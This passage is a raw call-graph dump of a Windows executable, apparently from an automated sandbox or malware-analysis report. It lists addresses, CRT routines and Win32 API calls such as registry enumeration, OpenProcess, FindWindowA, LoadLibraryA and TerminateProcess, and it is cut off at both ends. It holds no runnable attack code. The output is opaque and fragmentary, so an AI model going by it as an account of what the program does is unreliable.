calls 72405->72406 72407 11166186 72406->72407 72408 111661b0 72407->72408 72417 111661cb 72407->72417 72409 111661ba 72408->72409 72412 11165e4d __setlocale_set_cat 100 API calls 72408->72412 72418 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 72409->72418 72410 111662f5 72410->72409 72522 11165ac7 70 API calls 6 library calls 72410->72522 72411->72405 72428 1116606a _memcmp 72411->72428 72520 11174ea4 79 API calls 2 library calls 72411->72520 72412->72409 72413 1116631c 72419 11165c2c __expandlocale 96 API calls 72413->72419 72415 111660f0 72421 11163aa5 _free 66 API calls 72415->72421 72416 11166121 72416->72405 72422 1116612d InterlockedDecrement 72416->72422 72417->72410 72417->72413 72432 11166200 _strpbrk _strncmp _strcspn _strlen 72417->72432 72423 111663a1 72418->72423 72427 11166331 __tzset_nolock 72419->72427 72421->72398 72422->72405 72424 11166145 72422->72424 72423->72362 72425 11163aa5 _free 66 API calls 72424->72425 72426 1116614d 72425->72426 72429 11163aa5 _free 66 API calls 72426->72429 72427->72409 72427->72410 72430 11165e4d __setlocale_set_cat 100 API calls 72427->72430 72428->72415 72428->72416 72429->72405 72430->72427 72432->72409 72432->72410 72433 1116630e 72432->72433 72434 11165e4d __setlocale_set_cat 100 API calls 72432->72434 72521 111699f9 66 API calls __waccess_s 72432->72521 72435 1116ed72 __invoke_watson 10 API calls 72433->72435 72434->72432 72435->72409 72436->72366 72523 1116ec49 72437->72523 72440->72357 72443 11165956 _memset 72441->72443 72442 11165962 72442->72391 72443->72442 72446 11165985 _strcspn 72443->72446 72495 111699f9 66 API calls __waccess_s 72443->72495 72445 1116ed72 __invoke_watson 10 API calls 72445->72446 72446->72442 72446->72445 72496 111699f9 66 API calls __waccess_s 72446->72496 72449 1116c675 __getptd 66 API calls 72448->72449 72453 11174bd9 72449->72453 72450 11174be6 GetUserDefaultLCID 72467 11174c6d 72450->72467 72451 11174c10 72454 11174c78 72451->72454 72458 11174c22 72451->72458 72453->72450 72453->72451 72507 1117463f 85 API calls _LangCountryEnumProc@4 72453->72507 72454->72450 72460 11174c83 _strlen 72454->72460 72457 11174c36 72512 11174b90 EnumSystemLocalesA _GetPrimaryLen _strlen 72457->72512 72458->72457 72462 11174c2d 72458->72462 72459 11174dae 72459->72391 72466 11174c89 EnumSystemLocalesA 72460->72466 72461 11174cde 72461->72459 72468 11174d03 IsValidCodePage 72461->72468 72508 11174b29 72462->72508 72465 11174c34 72465->72467 72513 1117463f 85 API calls _LangCountryEnumProc@4 72465->72513 72466->72467 72467->72459 72497 111746a1 72467->72497 72468->72459 72471 11174d15 IsValidLocale 72468->72471 72470 11174c54 72470->72467 72472 11174c6f 72470->72472 72473 11174c66 72470->72473 72471->72459 72477 11174d28 72471->72477 72514 11174b90 EnumSystemLocalesA _GetPrimaryLen _strlen 72472->72514 72475 11174b29 _GetLcidFromLangCountry EnumSystemLocalesA 72473->72475 72475->72467 72476 11174d79 GetLocaleInfoA 72476->72459 72478 11174d8a GetLocaleInfoA 72476->72478 72477->72459 72477->72476 72479 1116cd5f _strcpy_s 66 API calls 72477->72479 72478->72459 72480 11174d9e 72478->72480 72481 11174d66 72479->72481 72515 1116c308 66 API calls _xtoa_s@20 72480->72515 72481->72478 72483 1116ed72 __invoke_watson 10 API calls 72481->72483 72483->72476 72485 1116cd74 72484->72485 72486 1116cd6d 72484->72486 72517 1116a1af 66 API calls __getptd_noexit 72485->72517 72486->72485 72489 1116cd92 72486->72489 72490 1116cd83 72489->72490 72519 1116a1af 66 API calls __getptd_noexit 72489->72519 72490->72391 72492 1116cd79 72518 1116edc4 11 API calls __waccess_s 72492->72518 72493->72391 72494->72391 72495->72446 72496->72446 72498 111746fb GetLocaleInfoW 72497->72498 72499 111746ab __tzset_nolock 72497->72499 72500 11174717 72498->72500 72501 111746ea 72498->72501 72499->72498 72503 111746c1 __tzset_nolock 72499->72503 72500->72501 72502 1117471d GetACP 72500->72502 72501->72461 72502->72461 72504 111746d2 GetLocaleInfoW 72503->72504 72505 111746ef 72503->72505 72504->72501 72516 11163c91 79 API calls __wcstoi64 72505->72516 72507->72451 72509 11174b30 _GetPrimaryLen _strlen 72508->72509 72510 11174b66 EnumSystemLocalesA 72509->72510 72511 11174b80 72510->72511 72511->72465 72512->72465 72513->72470 72514->72467 72515->72459 72516->72501 72517->72492 72518->72490 72519->72492 72520->72428 72521->72432 72522->72409 72524 1116ec68 _memset __call_reportfault 72523->72524 72525 1116ec86 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 72524->72525 72528 1116ed54 __call_reportfault 72525->72528 72526 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 72527 1116ed70 GetCurrentProcess TerminateProcess 72526->72527 72527->72357 72528->72526 72530 111436a6 72529->72530 72531 11143763 72530->72531 72536 11081d30 72530->72536 72531->72150 72533 111436cb 72534 11081d30 IsDBCSLeadByte 72533->72534 72535 111436fb _memmove 72534->72535 72535->72150 72537 11081d3c 72536->72537 72539 11081d41 std::_Mutex::_Mutex __mbschr_l 72536->72539 72540 11081c50 IsDBCSLeadByte 72537->72540 72539->72533 72540->72539 72542 11142e6a 72541->72542 72543 11142e6c 72541->72543 72542->72166 72544 11110230 std::_Mutex::_Mutex 265 API calls 72543->72544 72545 11142e92 72544->72545 72546 11142e9b _strncpy 72545->72546 72547 11142eb9 72545->72547 72546->72166 72553 11029a70 265 API calls 2 library calls 72547->72553 72554 11061970 72550->72554 72565 11061290 72554->72565 72558 11061a08 72612 11061170 72558->72612 72560 11061a1a 72562 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 72560->72562 72561 110619cc 72561->72558 72564 11061320 274 API calls 72561->72564 72563 11061a32 72562->72563 72564->72561 72566 111101b0 std::_Mutex::_Mutex 265 API calls 72565->72566 72567 110612ac 72566->72567 72568 110612f5 72567->72568 72569 110612b3 72567->72569 72624 1116305a 66 API calls std::exception::_Copy_str 72568->72624 72617 1105ee10 72569->72617 72572 110612eb 72576 11061320 72572->72576 72573 11061304 72625 111634b1 RaiseException 72573->72625 72575 11061319 72577 11061635 72576->72577 72582 11061355 72576->72582 72577->72561 72578 11061624 72579 1105ee10 68 API calls 72578->72579 72579->72577 72580 11061542 std::ios_base::_Tidy 72580->72578 72601 11146a90 268 API calls 72580->72601 72603 110615a0 72580->72603 72607 11081d30 IsDBCSLeadByte 72580->72607 72610 11061649 std::ios_base::_Tidy 72580->72610 72611 11081e70 86 API calls 72580->72611 72581 110614b4 72581->72578 72581->72580 72626 110611e0 72581->72626 72582->72581 72583 11061401 RegEnumValueA 72582->72583 72584 11061389 RegQueryInfoKeyA 72582->72584 72588 11061435 72583->72588 72589 1106149c 72583->72589 72586 110613c2 72584->72586 72587 110613ae 72584->72587 72592 110613e2 72586->72592 72636 11029a70 265 API calls 2 library calls 72586->72636 72635 11029a70 265 API calls 2 library calls 72587->72635 72594 11081d30 IsDBCSLeadByte 72588->72594 72599 1106146e RegEnumValueA 72588->72599 72588->72610 72637 11081e70 72588->72637 72593 11163aa5 _free 66 API calls 72589->72593 72597 11163a11 _malloc 66 API calls 72592->72597 72596 110614a9 72593->72596 72594->72588 72596->72581 72598 110613f0 72597->72598 72598->72583 72599->72588 72599->72589 72601->72580 72603->72580 72649 11029a70 265 API calls 2 library calls 72603->72649 72607->72580 72610->72561 72611->72580 72613 1105ee10 68 API calls 72612->72613 72614 110611a3 72613->72614 72615 110608e0 67 API calls 72614->72615 72616 110611c2 std::ios_base::_Tidy 72615->72616 72616->72560 72618 1105ee21 LeaveCriticalSection 72617->72618 72619 1105ee2b 72617->72619 72618->72619 72620 1105ee3f 72619->72620 72621 11163aa5 _free 66 API calls 72619->72621 72622 1105ee85 72620->72622 72623 1105ee49 EnterCriticalSection 72620->72623 72621->72620 72622->72572 72623->72572 72624->72573 72625->72575 72627 110611ee 72626->72627 72628 11061208 72626->72628 72650 110608e0 72627->72650 72628->72580 72632 11145bc0 72628->72632 72630 11061200 72658 110610f0 72630->72658 72699 111434c0 72632->72699 72638 11081e7d 72637->72638 72639 11081e82 72637->72639 72706 11081c50 IsDBCSLeadByte 72638->72706 72641 11081e8b 72639->72641 72645 11081e9f 72639->72645 72707 1116558e 85 API calls 2 library calls 72641->72707 72643 11081e98 72643->72588 72644 11081f03 72644->72588 72645->72644 72646 11166654 85 API calls std::_Mutex::_Mutex 72645->72646 72646->72645 72651 110608f4 72650->72651 72657 1106092c 72650->72657 72652 110608f8 72651->72652 72651->72657 72661 110606d0 72652->72661 72653 11060992 72653->72630 72657->72653 72666 11060470 67 API calls 2 library calls 72657->72666 72668 110609a0 72658->72668 72662 1106070e 72661->72662 72665 110606e3 std::ios_base::_Tidy 72661->72665 72662->72630 72663 110606d0 66 API calls 72663->72665 72665->72662 72665->72663 72667 1105fea0 66 API calls 2 library calls 72665->72667 72666->72657 72667->72665 72669 11060a24 72668->72669 72670 110609df 72668->72670 72700 111434d0 72699->72700 72700->72700 72701 11110230 std::_Mutex::_Mutex 265 API calls 72700->72701 72702 111434f8 72701->72702 72705 111433d0 8 API calls 3 library calls 72702->72705 72704 1106151f 72705->72704 72706->72639 72707->72643 72708->72176 72710 11124fd1 InitializeCriticalSection 72709->72710 72712 11124ffe GetCurrentThreadId 72710->72712 72714 11125035 72712->72714 72715 1112503c 72712->72715 72799 1110fff0 InterlockedIncrement 72714->72799 72757 11160b10 InterlockedIncrement 72715->72757 72718 11125051 72755->72185 72758 11160b27 CreateCompatibleDC 72757->72758 72759 11160b22 72757->72759 72760 11160b4c SelectPalette SelectPalette 72758->72760 72761 11160b38 72758->72761 72832 11160a60 272 API calls std::_Mutex::_Mutex 72759->72832 72834 11160750 265 API calls 72760->72834 72833 11029a70 265 API calls 2 library calls 72761->72833 72766 11160b73 72835 11160750 265 API calls 72766->72835 72768 11160b80 72769 11160b93 72768->72769 72770 11160c4e 72768->72770 72836 111606e0 265 API calls 2 library calls 72769->72836 72847 11160750 265 API calls 72770->72847 72773 11160b9e 72775 11160bc3 72773->72775 72776 11160bad GetSystemPaletteEntries 72773->72776 72774 11160c5b 72777 11160c61 DeleteDC 72774->72777 72778 11160be6 72775->72778 72779 11160bcf 72775->72779 72776->72778 72777->72718 72799->72715 72832->72758 72834->72766 72835->72768 72836->72773 72847->72774 73867->72235 73868->72240 73869 11116880 73887 11145ef0 73869->73887 73872 111168c5 73873 111168a8 73872->73873 73874 111168d4 CoInitialize CoCreateInstance 73872->73874 73875 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 73873->73875 73877 11116904 LoadLibraryA 73874->73877 73880 111168f9 73874->73880 73878 111168b6 73875->73878 73876 11145c70 std::_Mutex::_Mutex 90 API calls 73876->73872 73879 11116920 GetProcAddress 73877->73879 73877->73880 73883 11116930 SHGetSettings 73879->73883 73884 11116944 FreeLibrary 73879->73884 73881 111169e1 CoUninitialize 73880->73881 73882 111169e7 73880->73882 73881->73882 73885 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 73882->73885 73883->73884 73884->73880 73886 111169f6 73885->73886 73888 11145c70 std::_Mutex::_Mutex 90 API calls 73887->73888 73889 1111689e 73888->73889 73889->73872 73889->73873 73889->73876 73890 1102ebd0 73891 1102ec13 73890->73891 73892 111101b0 std::_Mutex::_Mutex 265 API calls 73891->73892 73893 1102ec1a 73892->73893 73895 1102ec3a 73893->73895 74951 11143630 73893->74951 73896 11143780 86 API calls 73895->73896 73897 1102ec64 73896->73897 73898 1102ec91 73897->73898 73899 11081e70 86 API calls 73897->73899 73901 11143780 86 API calls 73898->73901 73900 1102ec76 73899->73900 73902 11081e70 86 API calls 73900->73902 73903 1102ecba 73901->73903 73902->73898 73904 11163ca7 std::_Mutex::_Mutex 79 API calls 73903->73904 73908 1102ecc7 73903->73908 73904->73908 73905 1102ecf6 73906 1102ed68 73905->73906 73907 1102ed4f GetSystemMetrics 73905->73907 73912 1102ed82 CreateEventA 73906->73912 73907->73906 73909 1102ed5e 73907->73909 73908->73905 73910 11145c70 std::_Mutex::_Mutex 90 API calls 73908->73910 73911 11147060 std::_Mutex::_Mutex 21 API calls 73909->73911 73910->73905 73911->73906 73913 1102ed95 73912->73913 73914 1102eda9 73912->73914 74959 11029a70 265 API calls 2 library calls 73913->74959 73915 111101b0 std::_Mutex::_Mutex 265 API calls 73914->73915 73917 1102edb0 73915->73917 73918 1102edd0 73917->73918 73919 11110de0 426 API calls 73917->73919 73920 111101b0 std::_Mutex::_Mutex 265 API calls 73918->73920 73919->73918 73921 1102ede4 73920->73921 73922 11110de0 426 API calls 73921->73922 73923 1102ee04 73921->73923 73922->73923 73924 111101b0 std::_Mutex::_Mutex 265 API calls 73923->73924 73925 1102ee83 73924->73925 73926 1102eeb3 73925->73926 73927 11061aa0 301 API calls 73925->73927 73928 111101b0 std::_Mutex::_Mutex 265 API calls 73926->73928 73927->73926 73929 1102eecd 73928->73929 73930 1102eef2 FindWindowA 73929->73930 73932 11061710 293 API calls 73929->73932 73933 1102f032 73930->73933 73934 1102ef2b 73930->73934 73932->73930 73935 11061ef0 268 API calls 73933->73935 73934->73933 73937 1102ef43 GetWindowThreadProcessId 73934->73937 73936 1102f044 73935->73936 73938 11061ef0 268 API calls 73936->73938 73939 11147060 std::_Mutex::_Mutex 21 API calls 73937->73939 73940 1102f050 73938->73940 73941 1102ef60 OpenProcess 73939->73941 73942 11061ef0 268 API calls 73940->73942 73941->73933 73943 1102ef7d 73941->73943 73944 1102f05c 73942->73944 74960 11094f00 105 API calls 73943->74960 73945 1102f073 73944->73945 73946 1102f06a 73944->73946 74314 111464e0 73945->74314 74961 11028360 119 API calls 2 library calls 73946->74961 73949 1102ef9c 73952 11147060 std::_Mutex::_Mutex 21 API calls 73949->73952 73950 1102f06f 73950->73945 73954 1102efb0 73952->73954 73953 1102f082 73955 1102f086 73953->73955 74329 1102a6d0 IsJPIK 73953->74329 73956 1102efef CloseHandle FindWindowA 73954->73956 73960 11147060 std::_Mutex::_Mutex 21 API calls 73954->73960 74345 11145990 ExpandEnvironmentStringsA 73955->74345 73957 1102f022 73956->73957 73958 1102f014 GetWindowThreadProcessId 73956->73958 73962 11147060 std::_Mutex::_Mutex 21 API calls 73957->73962 73958->73957 73961 1102efc2 SendMessageA WaitForSingleObject 73960->73961 73961->73956 73964 1102efe2 73961->73964 73965 1102f02f 73962->73965 73967 11147060 std::_Mutex::_Mutex 21 API calls 73964->73967 73965->73933 73970 1102efec 73967->73970 73969 1102f0b5 73971 1102f177 73969->73971 74369 11063880 73969->74369 73970->73956 74384 11027b20 73971->74384 73975 110b7df0 std::_Mutex::_Mutex 9 API calls 73976 1102f0e3 73975->73976 73977 11147060 std::_Mutex::_Mutex 21 API calls 73976->73977 73978 1102f19c std::_Mutex::_Mutex 73990 1102f1b7 73978->73990 74404 1102ad70 73978->74404 73986 1102ad70 std::_Mutex::_Mutex 145 API calls 73986->73990 74407 110287a0 73990->74407 75029 111457a0 74314->75029 74317 111457a0 std::_Mutex::_Mutex 265 API calls 74318 11146517 wsprintfA 74317->74318 74319 11143e00 std::_Mutex::_Mutex 8 API calls 74318->74319 74321 11146534 74319->74321 74320 11146560 74322 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 74320->74322 74321->74320 74323 11143e00 std::_Mutex::_Mutex 8 API calls 74321->74323 74324 1114656c 74322->74324 74325 11146549 74323->74325 74324->73953 74325->74320 74326 11146550 74325->74326 74327 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 74326->74327 74328 1114655c 74327->74328 74328->73953 74330 1102a705 74329->74330 74331 1102a7d3 74329->74331 74332 111101b0 std::_Mutex::_Mutex 265 API calls 74330->74332 74331->73955 74333 1102a70c 74332->74333 74334 1102a73b 74333->74334 74335 11061aa0 301 API calls 74333->74335 74336 11063880 330 API calls 74334->74336 74335->74334 74337 1102a759 74336->74337 74337->74331 74338 110d1930 268 API calls 74337->74338 74340 1102a765 74338->74340 74339 1102a7c7 74341 110d0a10 265 API calls 74339->74341 74340->74339 74342 1102a798 74340->74342 74341->74331 74343 110d0a10 265 API calls 74342->74343 74344 1102a7a4 74343->74344 74344->73955 74346 111459c7 74345->74346 74347 111459d4 74346->74347 74348 111459e4 std::_Mutex::_Mutex 74346->74348 74349 111459fe 74346->74349 74351 11142e60 std::_Mutex::_Mutex 265 API calls 74347->74351 74352 111459f5 GetModuleFileNameA 74348->74352 74350 111457a0 std::_Mutex::_Mutex 265 API calls 74349->74350 74354 11145a04 74350->74354 74353 11145a58 74351->74353 74352->74354 74355 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 74353->74355 74356 11081e00 std::_Mutex::_Mutex IsDBCSLeadByte 74354->74356 74357 1102f0a3 74355->74357 74356->74347 74358 11143e00 74357->74358 74359 11143e21 CreateFileA 74358->74359 74361 11143ebe CloseHandle 74359->74361 74362 11143e9e 74359->74362 74365 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 74361->74365 74363 11143ea2 CreateFileA 74362->74363 74364 11143edb 74362->74364 74363->74361 74363->74364 74367 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 74364->74367 74366 11143ed7 74365->74366 74366->73969 74368 11143eea 74367->74368 74368->73969 74370 1105e820 79 API calls 74369->74370 74371 110638a8 74370->74371 75073 110627b0 74371->75073 74373 1102f0d6 74373->73971 74373->73975 74375 1105e950 5 API calls 74376 11063909 std::_Mutex::_Mutex 74375->74376 74377 1105e820 79 API calls 74376->74377 74378 1106393d 74377->74378 74379 1106395c 74378->74379 74382 1105e950 5 API calls 74378->74382 74382->74379 74385 11061a70 274 API calls 74384->74385 74386 11027b54 74385->74386 74387 1105e820 79 API calls 74386->74387 74388 11027b69 74387->74388 74389 11027bbf LoadIconA 74388->74389 74390 11145ef0 std::_Mutex::_Mutex 90 API calls 74388->74390 74402 11027c38 74388->74402 74391 11027bd1 74389->74391 74392 11027bda GetSystemMetrics GetSystemMetrics LoadImageA 74389->74392 74397 11027ba2 LoadLibraryExA 74390->74397 74391->74392 74394 11027c13 74392->74394 74395 11027bff LoadIconA 74392->74395 74393 11027cec 74396 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 74393->74396 74399 11027c17 GetSystemMetrics GetSystemMetrics LoadImageA 74394->74399 74394->74402 74395->74394 74400 11027cf9 74396->74400 74397->74389 74397->74395 74399->74402 74400->73978 74401 11081e70 86 API calls 74401->74402 74402->74393 74402->74401 74403 11145c70 std::_Mutex::_Mutex 90 API calls 74402->74403 75679 11061e10 268 API calls 4 library calls 74402->75679 74403->74402 75680 11028c10 74404->75680 74406 1102ad7e 74406->73986 74408 11147060 std::_Mutex::_Mutex 21 API calls 74407->74408 74409 110287c6 74408->74409 74410 110288b4 74409->74410 74411 110287dd GetModuleFileNameA 74409->74411 75716 11013dd0 22 API calls 2 library calls 74410->75716 74413 11081e00 std::_Mutex::_Mutex IsDBCSLeadByte 74411->74413 74415 11028801 74413->74415 74414 110288c7 74416 110288cd 74414->74416 74415->74416 74417 1102880e wsprintfA 74415->74417 74418 11147060 std::_Mutex::_Mutex 21 API calls 74416->74418 74420 11028842 74417->74420 74420->74416 74952 11143678 74951->74952 74955 1114363e 74951->74955 74953 11142e60 std::_Mutex::_Mutex 265 API calls 74952->74953 74954 11143680 74953->74954 74954->73895 74955->74952 74956 11143662 74955->74956 76741 11142ee0 267 API calls std::_Mutex::_Mutex 74956->76741 74958 11143668 74958->73895 74960->73949 74961->73950 75030 111457c2 75029->75030 75034 111457d9 std::_Mutex::_Mutex 75029->75034 75071 11029a70 265 API calls 2 library calls 75030->75071 75032 11145967 75035 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 75032->75035 75034->75032 75036 1114580c GetModuleFileNameA 75034->75036 75037 11145983 wsprintfA 75035->75037 75038 11081e00 std::_Mutex::_Mutex IsDBCSLeadByte 75036->75038 75037->74317 75039 11145821 75038->75039 75040 11145831 SHGetFolderPathA 75039->75040 75041 11145918 75039->75041 75043 1114585e 75040->75043 75044 1114587d SHGetFolderPathA 75040->75044 75042 11142e60 std::_Mutex::_Mutex 262 API calls 75041->75042 75042->75032 75043->75044 75047 11145864 75043->75047 75046 111458b2 std::_Mutex::_Mutex 75044->75046 75049 1102ad70 std::_Mutex::_Mutex 145 API calls 75046->75049 75072 11029a70 265 API calls 2 library calls 75047->75072 75051 111458c3 75049->75051 75053 11145240 75051->75053 75054 111452ca 75053->75054 75055 1114524b 75053->75055 75054->75041 75055->75054 75056 1114525b GetFileAttributesA 75055->75056 75057 11145275 75056->75057 75058 11145267 75056->75058 75059 11164bb8 __strdup 66 API calls 75057->75059 75058->75041 75060 1114527c 75059->75060 75061 11081e00 std::_Mutex::_Mutex IsDBCSLeadByte 75060->75061 75062 11145286 75061->75062 75063 11145240 std::_Mutex::_Mutex 67 API calls 75062->75063 75069 111452a3 75062->75069 75064 11145296 75063->75064 75065 111452ac 75064->75065 75066 1114529e 75064->75066 75068 11163aa5 _free 66 API calls 75065->75068 75067 11163aa5 _free 66 API calls 75066->75067 75067->75069 75070 111452b1 CreateDirectoryA 75068->75070 75069->75041 75070->75069 75194 11145a70 75073->75194 75075 1106283c 75076 110d1930 268 API calls 75075->75076 75077 11062850 75076->75077 75079 11062a37 75077->75079 75129 11062864 std::ios_base::_Tidy 75077->75129 75203 1116535d 75077->75203 75078 110637a8 75082 110d0a10 265 API calls 75078->75082 75081 1116535d _fgets 81 API calls 75079->75081 75080 11164c77 std::_Mutex::_Mutex 102 API calls 75080->75078 75084 11062a51 75081->75084 75180 11062931 std::ios_base::_Tidy 75082->75180 75088 11062a58 75084->75088 75092 11062ab7 _strpbrk 75084->75092 75085 110628e7 75086 110628ee 75085->75086 75100 1106293d _strpbrk std::_Mutex::_Mutex 75085->75100 75087 11062923 75086->75087 75258 11164c77 75086->75258 75091 110d0a10 265 API calls 75087->75091 75089 11062a9d 75088->75089 75094 11164c77 std::_Mutex::_Mutex 102 API calls 75088->75094 75095 110d0a10 265 API calls 75089->75095 75091->75180 75222 11164536 75092->75222 75093 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 75097 110637df 75093->75097 75094->75089 75095->75180 75097->74373 75097->74375 75097->74376 75099 11145b10 8 API calls 75147 11062afc _strpbrk std::_Mutex::_Mutex std::ios_base::_Tidy 75099->75147 75101 11163ca7 std::_Mutex::_Mutex 79 API calls 75100->75101 75102 110629ad 75101->75102 75103 11145b10 8 API calls 75102->75103 75129->75078 75129->75080 75147->75129 75180->75093 75200 11145a83 std::ios_base::_Tidy 75194->75200 75195 11145990 267 API calls 75195->75200 75196 11164ead std::_Mutex::_Mutex 143 API calls 75196->75200 75197 11145aea std::ios_base::_Tidy 75197->75075 75198 11145aa5 GetLastError 75199 11145ab0 Sleep 75198->75199 75198->75200 75201 11164ead std::_Mutex::_Mutex 143 API calls 75199->75201 75200->75195 75200->75196 75200->75197 75200->75198 75202 11145ac2 75201->75202 75202->75197 75202->75200 75205 11165369 ___DllMainCRTStartup 75203->75205 75204 1116537c 75322 1116a1af 66 API calls __getptd_noexit 75204->75322 75205->75204 75207 111653ad 75205->75207 75212 1116538c ___DllMainCRTStartup 75207->75212 75296 1116be59 75207->75296 75208 11165381 75323 1116edc4 11 API calls __waccess_s 75208->75323 75212->75085 75214 111653cc 75215 11165431 75214->75215 75331 1116a1af 66 API calls __getptd_noexit 75214->75331 75218 1116545e 75215->75218 75302 11172885 75215->75302 75333 1116548d LeaveCriticalSection LeaveCriticalSection __fsopen 75218->75333 75223 1116454f 75222->75223 75224 111642e0 strtoxl 79 API calls 75223->75224 75225 11062ae1 75224->75225 75225->75099 75259 11164c83 ___DllMainCRTStartup 75258->75259 75260 11164c95 75259->75260 75261 11164caa 75259->75261 75263 1116be59 __lock_file 67 API calls 75261->75263 75268 11164ca5 ___DllMainCRTStartup 75261->75268 75268->75087 75297 1116be8d EnterCriticalSection 75296->75297 75298 1116be6b 75296->75298 75300 111653bb 75297->75300 75298->75297 75299 1116be73 75298->75299 75301 1117459f __lock 66 API calls 75299->75301 75300->75215 75324 1116a147 75300->75324 75301->75300 75303 11172892 75302->75303 75307 111728a7 75302->75307 75367 1116a1af 66 API calls __getptd_noexit 75303->75367 75306 111728a2 75306->75215 75307->75306 75309 111728dc 75307->75309 75334 11177ff0 75307->75334 75322->75208 75323->75212 75325 1116a153 75324->75325 75326 1116a168 75324->75326 75379 1116a1af 66 API calls __getptd_noexit 75325->75379 75326->75214 75328 1116a158 75333->75212 75379->75328 75679->74402 75681 11028c33 75680->75681 75682 1102927b 75680->75682 75683 11028cf0 GetModuleFileNameA 75681->75683 75693 11028c68 75681->75693 75684 11029317 75682->75684 75685 1102932a 75682->75685 75686 11028d11 _strrchr 75683->75686 75687 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 75684->75687 75688 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 75685->75688 75691 11164ead std::_Mutex::_Mutex 143 API calls 75686->75691 75689 11029326 75687->75689 75690 1102933b 75688->75690 75689->74406 75690->74406 75692 11028ceb 75691->75692 75692->75682 75710 11026ef0 81 API calls 2 library calls 75692->75710 75695 11164ead std::_Mutex::_Mutex 143 API calls 75693->75695 75695->75692 75696 11028d64 75697 11163ca7 std::_Mutex::_Mutex 79 API calls 75696->75697 75707 110291e5 75696->75707 75707->75707 75710->75696 75716->74414 76741->74958 76756 110262f0 76757 110262fe GetProcAddress 76756->76757 76758 1102630f 76756->76758 76757->76758 76759 11026328 76758->76759 76760 1102631c K32GetProcessImageFileNameA 76758->76760 76762 1102632e GetProcAddress 76759->76762 76763 1102633f 76759->76763 76760->76759 76761 11026361 76760->76761 76762->76763 76764 11026346 76763->76764 76765 11026357 SetLastError 76763->76765 76765->76761 76766 1113d980 76767 1113d989 76766->76767 76768 1113d98e 76766->76768 76770 11139ed0 76767->76770 76771 11139f12 76770->76771 76772 11139f07 GetCurrentThreadId 76770->76772 76773 11139f20 76771->76773 76904 11029950 76771->76904 76772->76771 76911 11134830 76773->76911 76779 1113a011 76784 1113a042 FindWindowA 76779->76784 76790 1113a0da 76779->76790 76780 1113a59a 76781 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 76780->76781 76785 1113a5b2 76781->76785 76783 11139f5c IsWindow IsWindowVisible 76786 11147060 std::_Mutex::_Mutex 21 API calls 76783->76786 76787 1113a057 IsWindowVisible 76784->76787 76784->76790 76785->76768 76788 11139f87 76786->76788 76789 1113a05e 76787->76789 76787->76790 76791 1105e820 79 API calls 76788->76791 76789->76790 76797 11139a70 392 API calls 76789->76797 76792 1105e820 79 API calls 76790->76792 76803 1113a0ff 76790->76803 76795 11139fa3 IsWindowVisible 76791->76795 76818 1113a127 76792->76818 76793 1113a2b0 76796 1113a2ca 76793->76796 76800 11139a70 392 API calls 76793->76800 76794 1105e820 79 API calls 76798 1113a29f 76794->76798 76795->76779 76799 11139fb1 76795->76799 76802 1113a2e7 76796->76802 77147 1106c340 298 API calls 76796->77147 76801 1113a07f IsWindowVisible 76797->76801 76798->76793 76804 1113a2a4 76798->76804 76799->76779 76805 11139fb9 76799->76805 76800->76796 76801->76790 76806 1113a08e IsIconic 76801->76806 77148 1112ddd0 12 API calls 2 library calls 76802->77148 76803->76793 76803->76794 77146 1102d750 294 API calls std::_Mutex::_Mutex 76804->77146 76810 11147060 std::_Mutex::_Mutex 21 API calls 76805->76810 76806->76790 76811 1113a09f GetForegroundWindow 76806->76811 76816 11139fc3 GetForegroundWindow 76810->76816 77144 11132120 147 API calls 76811->77144 76812 1113a2ec 76813 1113a2f4 76812->76813 76814 1113a2fd 76812->76814 77149 11132a10 89 API calls 3 library calls 76813->77149 76822 1113a314 76814->76822 76823 1113a308 76814->76823 76815 1113a2ab 76815->76793 76825 11139fd2 EnableWindow 76816->76825 76826 11139ffe 76816->76826 76818->76803 76819 1113a174 76818->76819 76820 11081d30 IsDBCSLeadByte 76818->76820 76824 11143e00 std::_Mutex::_Mutex 8 API calls 76819->76824 76820->76819 77151 111326b0 299 API calls std::_Mutex::_Mutex 76822->77151 76829 1113a319 76823->76829 77150 11132780 299 API calls std::_Mutex::_Mutex 76823->77150 76830 1113a186 76824->76830 77142 11132120 147 API calls 76825->77142 76826->76779 76834 1113a00a SetForegroundWindow 76826->76834 76827 1113a0ae 77145 11132120 147 API calls 76827->77145 76828 1113a2fa 76828->76814 76838 1113a312 76829->76838 76839 1113a429 76829->76839 76837 1113a193 GetLastError 76830->76837 76852 1113a1a1 76830->76852 76834->76779 76835 1113a0b5 76842 1113a0cb EnableWindow 76835->76842 76847 1113a0c4 SetForegroundWindow 76835->76847 76843 11147060 std::_Mutex::_Mutex 21 API calls 76837->76843 76838->76829 76844 1113a331 76838->76844 76845 1113a3db 76838->76845 76841 11139600 295 API calls 76839->76841 76840 11139fe9 77143 11132120 147 API calls 76840->77143 76861 1113a42e 76841->76861 76842->76790 76843->76852 76844->76839 76854 111101b0 std::_Mutex::_Mutex 265 API calls 76844->76854 76845->76839 77159 1103f920 68 API calls 76845->77159 76847->76842 76848 11139ff0 EnableWindow 76848->76826 76849 1113a455 76863 1105e820 79 API calls 76849->76863 76903 1113a57a std::ios_base::_Tidy 76849->76903 76851 1113a3ea 77160 1103f960 68 API calls 76851->77160 76852->76803 76853 1113a1f2 76852->76853 76858 11081d30 IsDBCSLeadByte 76852->76858 76856 11143e00 